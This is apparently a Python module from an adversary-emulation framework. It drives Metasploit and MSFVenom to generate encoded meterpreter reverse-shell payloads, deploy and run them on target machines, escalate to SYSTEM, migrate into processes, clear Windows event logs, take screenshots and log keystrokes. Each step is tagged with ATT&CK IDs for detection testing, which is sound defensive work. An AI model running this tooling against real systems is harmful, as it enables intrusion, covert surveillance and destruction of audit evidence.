|
|
|
|
#!/usr/bin/env python3
|
|
|
|
|
""" Module to control Metasploit and related tools (MSFVenom) on the attack server """
|
|
|
|
|
|
|
|
|
|
import time
|
|
|
|
|
import socket
|
|
|
|
|
import os
|
|
|
|
|
import random
|
|
|
|
|
import requests
|
|
|
|
|
|
|
|
|
|
from pymetasploit3.msfrpc import MsfRpcClient
|
|
|
|
|
# from app.machinecontrol import Machine
|
|
|
|
|
from app.attack_log import AttackLog
|
|
|
|
|
from app.interface_sfx import CommandlineColors
|
|
|
|
|
from app.exceptions import MetasploitError, ServerError
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# https://github.com/DanMcInerney/pymetasploit3
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit():
|
|
|
|
|
""" Metasploit class for basic Metasploit wrapping """
|
|
|
|
|
|
|
|
|
|
def __init__(self, password, attack_logger, **kwargs):
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
:param password: password for the msfrpcd
|
|
|
|
|
:param attack_logger: The attack logger to use for logging/printing
|
|
|
|
|
:param kwargs: Relevant ones: uri, port, server, username
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
self.password = password
|
|
|
|
|
self.attack_logger = attack_logger
|
|
|
|
|
self.username = kwargs.get("username", None)
|
|
|
|
|
self.kwargs = kwargs
|
|
|
|
|
self.client = None
|
|
|
|
|
|
|
|
|
|
# Optional attacker: If a running attacker machine is passed, we take it and start the msfrpcd
|
|
|
|
|
# Alternative: The server is taken and we expect an already running msfrpcd there
|
|
|
|
|
self.attacker = kwargs.get("attacker", None)
|
|
|
|
|
if self.attacker:
|
|
|
|
|
# we expect a running attacker but without a running msfrcpd
|
|
|
|
|
self.start_msfrpcd()
|
|
|
|
|
kwargs["server"] = self.attacker.get_ip()
|
|
|
|
|
time.sleep(3) # Waiting for server to start. Or we would get https connection errors when getting the client.
|
|
|
|
|
|
|
|
|
|
def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler'):
|
|
|
|
|
""" Start a metasploit handler and wait for external payload to connect
|
|
|
|
|
|
|
|
|
|
@:returns: res, which contains "job_id" and "uuid"
|
|
|
|
|
"""
|
|
|
|
|
exploit = self.get_client().modules.use('exploit', exploit)
|
|
|
|
|
# print(exploit.description)
|
|
|
|
|
# print(exploit.missing_required)
|
|
|
|
|
payload = self.get_client().modules.use('payload', payload)
|
|
|
|
|
# print(payload.description)
|
|
|
|
|
# print(payload.missing_required)
|
|
|
|
|
payload["LHOST"] = self.attacker.get_ip()
|
|
|
|
|
res = exploit.execute(payload=payload)
|
|
|
|
|
print(res)
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def start_msfrpcd(self):
|
|
|
|
|
""" Starts the msfrpcs on the attacker. Metasploit must alredy be installed there ! """
|
|
|
|
|
|
|
|
|
|
cmd = f"killall msfrpcd; nohup msfrpcd -P {self.password} -U {self.username} -S &"
|
|
|
|
|
|
|
|
|
|
self.attacker.remote_run(cmd, disown=True)
|
|
|
|
|
# print("msfrpcd started")
|
|
|
|
|
# breakpoint()
|
|
|
|
|
time.sleep(3)
|
|
|
|
|
|
|
|
|
|
def get_client(self):
|
|
|
|
|
""" Get a local metasploit client connected to the metasploit server """
|
|
|
|
|
|
|
|
|
|
# print("starting get client")
|
|
|
|
|
# print(f"Password: {self.password}")
|
|
|
|
|
# print(f"Kwargs: {self.kwargs}")
|
|
|
|
|
|
|
|
|
|
if self.client:
|
|
|
|
|
return self.client
|
|
|
|
|
|
|
|
|
|
self.client = None
|
|
|
|
|
retries = 5
|
|
|
|
|
sleeptime = 5
|
|
|
|
|
|
|
|
|
|
while retries:
|
|
|
|
|
try:
|
|
|
|
|
self.client = MsfRpcClient(self.password, **self.kwargs)
|
|
|
|
|
break
|
|
|
|
|
except requests.exceptions.ConnectionError:
|
|
|
|
|
self.start_msfrpcd()
|
|
|
|
|
time.sleep(sleeptime)
|
|
|
|
|
sleeptime += 5
|
|
|
|
|
print("Failed getting connection to msfrpcd. Retries left: {retries}")
|
|
|
|
|
retries -= 1
|
|
|
|
|
|
|
|
|
|
if self.client is None:
|
|
|
|
|
raise ServerError("Was not able to properly start and connect to msfrpcd")
|
|
|
|
|
|
|
|
|
|
return self.client
|
|
|
|
|
|
|
|
|
|
def wait_for_session(self, retries=50):
|
|
|
|
|
""" Wait until we get a session """
|
|
|
|
|
|
|
|
|
|
while self.get_client().sessions.list == {}:
|
|
|
|
|
time.sleep(1)
|
|
|
|
|
print(f"Waiting to get any session {retries}")
|
|
|
|
|
retries -= 1
|
|
|
|
|
if retries <= 0:
|
|
|
|
|
raise MetasploitError("Can not find any session")
|
|
|
|
|
|
|
|
|
|
def get_sid(self, session_number=0):
|
|
|
|
|
""" Get the first session between hacked target and the metasploit server
|
|
|
|
|
|
|
|
|
|
@param session_number: number of the session to get
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
self.wait_for_session()
|
|
|
|
|
|
|
|
|
|
return list(self.get_client().sessions.list)[session_number]
|
|
|
|
|
|
|
|
|
|
def get_sid_to(self, target):
|
|
|
|
|
""" Get the session to a specified target
|
|
|
|
|
|
|
|
|
|
@param target: a target machine to find in the session list
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
print(f"Sessions: {self.get_client().sessions.list}")
|
|
|
|
|
|
|
|
|
|
# Get_ip can also return a network name. Matching a session needs a real ip
|
|
|
|
|
name_resolution_worked = True
|
|
|
|
|
try:
|
|
|
|
|
target_ip = socket.gethostbyname(target.get_ip())
|
|
|
|
|
except socket.gaierror:
|
|
|
|
|
target_ip = target.get_ip() # Limp on feature if we can not get a name resolution
|
|
|
|
|
name_resolution_worked = False
|
|
|
|
|
print(f"Name resolution for {target.get_ip()} failed. Sessions are: {self.get_client().sessions.list}")
|
|
|
|
|
|
|
|
|
|
retries = 100
|
|
|
|
|
while retries > 0:
|
|
|
|
|
for key, value in self.get_client().sessions.list.items():
|
|
|
|
|
if value["session_host"] == target_ip:
|
|
|
|
|
# print(f"session list: {self.get_client().sessions.list}")
|
|
|
|
|
return key
|
|
|
|
|
|
|
|
|
|
time.sleep(1)
|
|
|
|
|
retries -= 1
|
|
|
|
|
raise MetasploitError(f"Could not find session for {target.get_ip()} Name resolution worked: {name_resolution_worked}")
|
|
|
|
|
|
|
|
|
|
def meterpreter_execute(self, cmds: [str], session_number: int, delay=0) -> str:
|
|
|
|
|
""" Executes commands on the meterpreter, returns results read from shell
|
|
|
|
|
|
|
|
|
|
@param cmds: commands to execute, a list
|
|
|
|
|
@param session_number: session number
|
|
|
|
|
@param delay: optional delay between calling the command and expecting a result
|
|
|
|
|
@:return: the string results
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
shell = self.client.sessions.session(self.get_sid(session_number))
|
|
|
|
|
res = []
|
|
|
|
|
for cmd in cmds:
|
|
|
|
|
shell.write(cmd.strip())
|
|
|
|
|
time.sleep(delay)
|
|
|
|
|
res.append(shell.read())
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def meterpreter_execute_on(self, cmds: [str], target, delay=0) -> str:
|
|
|
|
|
""" Executes commands on the meterpreter, returns results read from shell
|
|
|
|
|
|
|
|
|
|
@param cmds: commands to execute, a list
|
|
|
|
|
@param target: target machine
|
|
|
|
|
@param delay: optional delay between calling the command and expecting a result
|
|
|
|
|
@:return: the string results
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
session_id = self.get_sid_to(target)
|
|
|
|
|
# print(f"Session ID: {session_id}")
|
|
|
|
|
shell = self.client.sessions.session(session_id)
|
|
|
|
|
res = []
|
|
|
|
|
time.sleep(1) # To ensure an active session
|
|
|
|
|
for cmd in cmds:
|
|
|
|
|
shell.write(cmd)
|
|
|
|
|
time.sleep(delay)
|
|
|
|
|
retries = 20
|
|
|
|
|
shell_result = ""
|
|
|
|
|
while retries > 0:
|
|
|
|
|
shell_result += shell.read()
|
|
|
|
|
time.sleep(0.5) # Command needs time to execute
|
|
|
|
|
retries -= 1
|
|
|
|
|
res.append(shell_result)
|
|
|
|
|
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def smart_infect(self, target, payload_type="windows/x64/meterpreter/reverse_https", payload_name="babymetal.exe"):
|
|
|
|
|
""" Checks if a target already has a meterpreter session open. Will deploy a payload if not """
|
|
|
|
|
|
|
|
|
|
# TODO Smart_infect should detect the platform of the target and pick the proper parameters based on that
|
|
|
|
|
|
|
|
|
|
try:
|
|
|
|
|
self.start_exploit_stub_for_external_payload(payload=payload_type)
|
|
|
|
|
self.wait_for_session(2)
|
|
|
|
|
except MetasploitError:
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Create payload {payload_name} replacement{CommandlineColors.ENDC}",
|
|
|
|
|
1)
|
|
|
|
|
venom = MSFVenom(self.attacker, target, self.attack_logger)
|
|
|
|
|
venom.generate_and_deploy(payload=payload_type,
|
|
|
|
|
architecture="x86",
|
|
|
|
|
platform="windows",
|
|
|
|
|
lhost=self.attacker.get_ip(),
|
|
|
|
|
format="exe",
|
|
|
|
|
outfile=payload_name,
|
|
|
|
|
encoder="x86/shikata_ga_nai",
|
|
|
|
|
iterations=5
|
|
|
|
|
)
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {payload_name} replacement - waiting for meterpreter shell{CommandlineColors.ENDC}",
|
|
|
|
|
1)
|
|
|
|
|
|
|
|
|
|
self.start_exploit_stub_for_external_payload(payload=payload_type)
|
|
|
|
|
self.wait_for_session()
|
|
|
|
|
|
|
|
|
|
##########################################################################
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class MSFVenom():
|
|
|
|
|
""" Class to remote controll payload generator MSFVenom on the attacker machine """
|
|
|
|
|
|
|
|
|
|
def __init__(self, attacker, target, attack_logger: AttackLog):
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
:param attacker: attacker machine
|
|
|
|
|
:param target: target machine
|
|
|
|
|
:param attack_logger: The logger for the attack
|
|
|
|
|
"""
|
|
|
|
|
# https://www.offensive-security.com/metasploit-unleashed/msfvenom/
|
|
|
|
|
|
|
|
|
|
self.attacker = attacker
|
|
|
|
|
self.target = target
|
|
|
|
|
self.attack_logger = attack_logger
|
|
|
|
|
|
|
|
|
|
def generate_payload(self, **kwargs):
|
|
|
|
|
""" Generates a payload on the attacker machine
|
|
|
|
|
|
|
|
|
|
"""
|
|
|
|
|
payload = kwargs.get("payload", None)
|
|
|
|
|
architecture = kwargs.get("architecture", None)
|
|
|
|
|
platform = kwargs.get("platform", self.target.get_os())
|
|
|
|
|
lhost = kwargs.get("lhost", self.attacker.get_ip())
|
|
|
|
|
file_format = kwargs.get("format", None) # file format
|
|
|
|
|
outfile = kwargs.get("outfile", "payload.exe")
|
|
|
|
|
encoder = kwargs.get("encoder", None)
|
|
|
|
|
iterations = kwargs.get("iterations", None)
|
|
|
|
|
|
|
|
|
|
cmd = "msfvenom"
|
|
|
|
|
if architecture is not None:
|
|
|
|
|
if architecture not in ["x86", "x64"]:
|
|
|
|
|
raise MetasploitError(f"MSFVenom wrapper does not support architecture {architecture}")
|
|
|
|
|
cmd += f" -a {architecture}"
|
|
|
|
|
if platform is not None:
|
|
|
|
|
if platform not in ["windows", "linux"]:
|
|
|
|
|
raise MetasploitError(f"MSFVenom wrapper does not support platform {platform}")
|
|
|
|
|
cmd += f" --platform {platform}"
|
|
|
|
|
if payload is not None:
|
|
|
|
|
cmd += f" -p {payload}"
|
|
|
|
|
if lhost is not None:
|
|
|
|
|
cmd += f" LHOST={lhost}"
|
|
|
|
|
if file_format is not None:
|
|
|
|
|
cmd += f" -f {file_format}"
|
|
|
|
|
if outfile is not None:
|
|
|
|
|
cmd += f" -o {outfile}"
|
|
|
|
|
if encoder is not None:
|
|
|
|
|
if encoder not in ["x86/shikata_ga_nai"]:
|
|
|
|
|
raise MetasploitError(f"MSFVenom wrapper does not support encoder {encoder}")
|
|
|
|
|
cmd += f" -e {encoder}"
|
|
|
|
|
if iterations is not None:
|
|
|
|
|
cmd += f" -i {iterations}"
|
|
|
|
|
|
|
|
|
|
# Detecting all the mistakes that already have been made. To be continued
|
|
|
|
|
# Check if encoder supports the architecture
|
|
|
|
|
if encoder == "x86/shikata_ga_nai" and architecture == "x64":
|
|
|
|
|
raise MetasploitError(f"Encoder {encoder} does not support 64 bit architecture")
|
|
|
|
|
|
|
|
|
|
# Check if payload is for the right amount of bit
|
|
|
|
|
if architecture == "x64" and "/x64/" not in payload:
|
|
|
|
|
raise MetasploitError(f"Payload {payload} does not support 64 bit architecture")
|
|
|
|
|
if architecture == "x86" and "/x64/" in payload:
|
|
|
|
|
raise MetasploitError(f"Payload {payload} does not support 32 bit architecture")
|
|
|
|
|
|
|
|
|
|
# Check if payload is platform
|
|
|
|
|
if platform not in payload:
|
|
|
|
|
raise MetasploitError(f"Payload {payload} support platform {platform}")
|
|
|
|
|
|
|
|
|
|
# Footnote: Currently we only support windows/linux and the "boring" payloads. This will be more tricky as soon as we get creative here
|
|
|
|
|
|
|
|
|
|
self.attacker.remote_run(cmd)
|
|
|
|
|
|
|
|
|
|
def generate_and_deploy(self, **kwargs):
|
|
|
|
|
""" Will generate the payload and directly deploy it to the target
|
|
|
|
|
|
|
|
|
|
:return:
|
|
|
|
|
"""
|
|
|
|
|
self.generate_payload(**kwargs)
|
|
|
|
|
|
|
|
|
|
payload_name = kwargs.get("outfile", "payload.exe")
|
|
|
|
|
|
|
|
|
|
self.attacker.get(payload_name, self.target.get_machine_path_external())
|
|
|
|
|
src = os.path.join(self.target.get_machine_path_external(), payload_name)
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Generated {payload_name}...deploying it{CommandlineColors.ENDC}",
|
|
|
|
|
1)
|
|
|
|
|
# Deploy to target
|
|
|
|
|
if self.attack_logger:
|
|
|
|
|
logid = self.attack_logger.start_file_write("", self.target.get_name(), payload_name)
|
|
|
|
|
playground = self.target.get_playground()
|
|
|
|
|
print(f"Putting to {self.target.get_name() }/ {playground}")
|
|
|
|
|
self.target.put(src, playground)
|
|
|
|
|
if self.attack_logger:
|
|
|
|
|
self.attack_logger.stop_file_write("", self.target.get_name(), payload_name, logid=logid)
|
|
|
|
|
|
|
|
|
|
if self.target.get_os() == "linux":
|
|
|
|
|
if self.target.get_playground() is not None:
|
|
|
|
|
cmd = f"cd {self.target.get_playground()};"
|
|
|
|
|
else:
|
|
|
|
|
cmd = ""
|
|
|
|
|
cmd += f"chmod +x {payload_name}; ./{payload_name}"
|
|
|
|
|
if self.target.get_os() == "windows":
|
|
|
|
|
cmd = f'{payload_name}'
|
|
|
|
|
|
|
|
|
|
print(cmd)
|
|
|
|
|
|
|
|
|
|
if self.attack_logger:
|
|
|
|
|
logid = self.attack_logger.start_execute_payload("", self.target.get_name(), cmd)
|
|
|
|
|
res = self.target.remote_run(cmd, disown=True)
|
|
|
|
|
print(f"Running payload, result is {res}")
|
|
|
|
|
if self.attack_logger:
|
|
|
|
|
self.attack_logger.stop_execute_payload("", self.target.get_name(), cmd, logid=logid)
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Executed payload {payload_name} on {self.target.get_name()} {CommandlineColors.ENDC}",
|
|
|
|
|
1)
|
|
|
|
|
|
|
|
|
|
################
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class MetasploitInstant(Metasploit):
|
|
|
|
|
""" A simple metasploit class with pre-defined metasploit attacks and logging. Just add water
|
|
|
|
|
|
|
|
|
|
The attacks pre-defioned in here are the bread-and-butter attacks, the most basic ones. Those you will need all the time when simulating and adversary.
|
|
|
|
|
No need to add specific/specific ones in here. In attack plugins you will find all the features as well. Better code them there.
|
|
|
|
|
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
def parse_ps(self, ps_output):
|
|
|
|
|
""" Parses the data from ps
|
|
|
|
|
:param ps_output: Metasploit ps output
|
|
|
|
|
:return: A list of dicts
|
|
|
|
|
"""
|
|
|
|
|
ps_data = []
|
|
|
|
|
for line in ps_output.split("\n")[6:]:
|
|
|
|
|
pieces = line.split(" ")
|
|
|
|
|
cleaned_pieces = []
|
|
|
|
|
for piece in pieces:
|
|
|
|
|
if len(piece):
|
|
|
|
|
cleaned_pieces.append(piece)
|
|
|
|
|
|
|
|
|
|
if len(cleaned_pieces) > 2:
|
|
|
|
|
rep = {"PID": int(cleaned_pieces[0].strip()),
|
|
|
|
|
"PPID": int(cleaned_pieces[1].strip()),
|
|
|
|
|
"Name": cleaned_pieces[2].strip(),
|
|
|
|
|
"Arch": None,
|
|
|
|
|
"Session": None,
|
|
|
|
|
"User": None,
|
|
|
|
|
"Path": None}
|
|
|
|
|
if len(cleaned_pieces) >= 4:
|
|
|
|
|
rep["Arch"] = cleaned_pieces[3].strip()
|
|
|
|
|
if len(cleaned_pieces) >= 5:
|
|
|
|
|
rep["Session"] = int(cleaned_pieces[4].strip())
|
|
|
|
|
if len(cleaned_pieces) >= 6:
|
|
|
|
|
rep["User"] = cleaned_pieces[5].strip()
|
|
|
|
|
if len(cleaned_pieces) >= 7:
|
|
|
|
|
rep["Path"] = cleaned_pieces[6].strip()
|
|
|
|
|
ps_data.append(rep)
|
|
|
|
|
|
|
|
|
|
return ps_data
|
|
|
|
|
|
|
|
|
|
def filter_ps_results(self, data, user=None, name=None, arch=None):
|
|
|
|
|
""" Filter the process lists for certain
|
|
|
|
|
|
|
|
|
|
@param user: The user to filter for.
|
|
|
|
|
@param name: The process name to filter for (executable name)
|
|
|
|
|
@param arch: The architecture to select. 'x64' is one option
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
res = data
|
|
|
|
|
if user is not None:
|
|
|
|
|
res = [item for item in res if item["User"] == user]
|
|
|
|
|
if name is not None:
|
|
|
|
|
res = [item for item in res if item["Name"].lower() == name.lower()]
|
|
|
|
|
if arch is not None:
|
|
|
|
|
res = [item for item in res if item["Arch"] == arch]
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def ps_process_discovery(self, target, **kwargs):
|
|
|
|
|
""" Do a process discovery on the target """
|
|
|
|
|
|
|
|
|
|
command = "ps -ax"
|
|
|
|
|
ttp = "T1057"
|
|
|
|
|
tactics = "Discovery"
|
|
|
|
|
tactics_id = "TA0007"
|
|
|
|
|
description = "Process discovery can be used to identify running security solutions, processes with elevated privileges, interesting services."
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
name="ps",
|
|
|
|
|
description=description,
|
|
|
|
|
tactics=tactics,
|
|
|
|
|
tactics_id=tactics_id,
|
|
|
|
|
situation_description=kwargs.get("situation_description", None),
|
|
|
|
|
countermeasure=kwargs.get("countermeasure", None)
|
|
|
|
|
)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
logid=logid)
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def migrate(self, target, user=None, name=None, arch=None):
|
|
|
|
|
""" Migrate to a process matching certain criteria
|
|
|
|
|
|
|
|
|
|
@param user: The user to filter for.
|
|
|
|
|
@param name: The process name to filter for (executable name)
|
|
|
|
|
@param arch: The architecture to select. 'x64' is one option
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
ttp = "T1055"
|
|
|
|
|
|
|
|
|
|
process_list = self.ps_process_discovery(target)
|
|
|
|
|
ps = self.parse_ps(process_list[0])
|
|
|
|
|
filtered_list = self.filter_ps_results(ps, user, name, arch)
|
|
|
|
|
|
|
|
|
|
if len(filtered_list) == 0:
|
|
|
|
|
print(process_list)
|
|
|
|
|
raise MetasploitError("Did not find a matching process to migrate to")
|
|
|
|
|
|
|
|
|
|
# picking random target process
|
|
|
|
|
target_process = random.choice(filtered_list)
|
|
|
|
|
print(f"Migrating to process {target_process}")
|
|
|
|
|
command = f"migrate {target_process['PID']}"
|
|
|
|
|
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
print(res)
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def arp_network_discovery(self, target, **kwargs):
|
|
|
|
|
""" Do a network discovery on the target """
|
|
|
|
|
|
|
|
|
|
command = "arp"
|
|
|
|
|
ttp = "T1016"
|
|
|
|
|
tactics = "Discovery"
|
|
|
|
|
tactics_id = "TA0007"
|
|
|
|
|
description = "Network discovery can be a first step for lateral movement."
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
name="arp",
|
|
|
|
|
description=description,
|
|
|
|
|
tactics=tactics,
|
|
|
|
|
tactics_id=tactics_id,
|
|
|
|
|
situation_description=kwargs.get("situation_description",
|
|
|
|
|
None),
|
|
|
|
|
countermeasure=kwargs.get("countermeasure", None)
|
|
|
|
|
)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
print(res)
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
logid=logid)
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def nslookup(self, target, target2, **kwargs):
|
|
|
|
|
""" Do a nslookup discovery on the target
|
|
|
|
|
|
|
|
|
|
@param target: Command runs here
|
|
|
|
|
@param target2: This one is looked up
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
command = f"execute -f nslookup.exe -H -i -a '{target2.get_ip()}'"
|
|
|
|
|
ttp = "T1018"
|
|
|
|
|
tactics = "Discovery"
|
|
|
|
|
tactics_id = "TA0007"
|
|
|
|
|
description = "Nslookup to get information on a specific target"
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
name="nslookup",
|
|
|
|
|
description=description,
|
|
|
|
|
tactics=tactics,
|
|
|
|
|
tactics_id=tactics_id,
|
|
|
|
|
situation_description=kwargs.get("situation_description",
|
|
|
|
|
None),
|
|
|
|
|
countermeasure=kwargs.get("countermeasure", None)
|
|
|
|
|
)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
print(res)
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
logid=logid)
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def getsystem(self, target, **kwargs):
|
|
|
|
|
""" Do a network discovery on the target """
|
|
|
|
|
|
|
|
|
|
command = "getsystem"
|
|
|
|
|
ttp = "????" # It uses one out of three different ways to elevate privileges.
|
|
|
|
|
tactics = "Privilege Escalation"
|
|
|
|
|
tactics_id = "TA0004"
|
|
|
|
|
description = """
|
|
|
|
|
Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:
|
|
|
|
|
* named pipe impersonation using cmd
|
|
|
|
|
* named pipe impersonation using a dll
|
|
|
|
|
* token duplication
|
|
|
|
|
"""
|
|
|
|
|
# https://docs.rapid7.com/metasploit/meterpreter-getsystem/
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
name="getsystem",
|
|
|
|
|
description=description,
|
|
|
|
|
tactics=tactics,
|
|
|
|
|
tactics_id=tactics_id,
|
|
|
|
|
situation_description=kwargs.get("situation_description", None),
|
|
|
|
|
countermeasure=kwargs.get("countermeasure", None)
|
|
|
|
|
)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
print(res)
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp,
|
|
|
|
|
logid=logid)
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def clearev(self, target):
|
|
|
|
|
""" Clears windows event logs """
|
|
|
|
|
|
|
|
|
|
command = "clearev"
|
|
|
|
|
ttp = "T1070.001" # It uses one out of three different ways to elevate privileges.
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
print(res)
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def screengrab(self, target):
|
|
|
|
|
""" Creates a screenshot
|
|
|
|
|
|
|
|
|
|
Before using it, migrate to a process running while you want to monitor.
|
|
|
|
|
One with the permission "NT AUTHORITY\\SYSTEM"
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
command = "screengrab"
|
|
|
|
|
ttp = "T1113" # It uses one out of three different ways to elevate privileges.
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
res = self.meterpreter_execute_on(["use espia"], target)
|
|
|
|
|
print(res)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
print(res)
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
def keylogging(self, target, monitoring_time):
|
|
|
|
|
""" Starts keylogging
|
|
|
|
|
|
|
|
|
|
Before using it, migrate to a process running while you want to monitor.
|
|
|
|
|
|
|
|
|
|
"winlogon.exe" will monitor user logins. "explorer.exe" during the session.
|
|
|
|
|
|
|
|
|
|
@param monitoring_time: Seconds the keylogger is running
|
|
|
|
|
@param monitoring_time: The time to monitor the keys. In seconds
|
|
|
|
|
"""
|
|
|
|
|
|
|
|
|
|
command = "keyscan_start"
|
|
|
|
|
ttp = "T1056.001" # It uses one out of three different ways to elevate privileges.
|
|
|
|
|
|
|
|
|
|
self.attack_logger.vprint(
|
|
|
|
|
f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1)
|
|
|
|
|
|
|
|
|
|
self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
res = self.meterpreter_execute_on([command], target)
|
|
|
|
|
print(res)
|
|
|
|
|
time.sleep(monitoring_time)
|
|
|
|
|
res = self.meterpreter_execute_on(["keyscan_dump"], target)
|
|
|
|
|
print(res)
|
|
|
|
|
self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(),
|
|
|
|
|
target=target.get_ip(),
|
|
|
|
|
metasploit_command=command,
|
|
|
|
|
ttp=ttp)
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
|
|
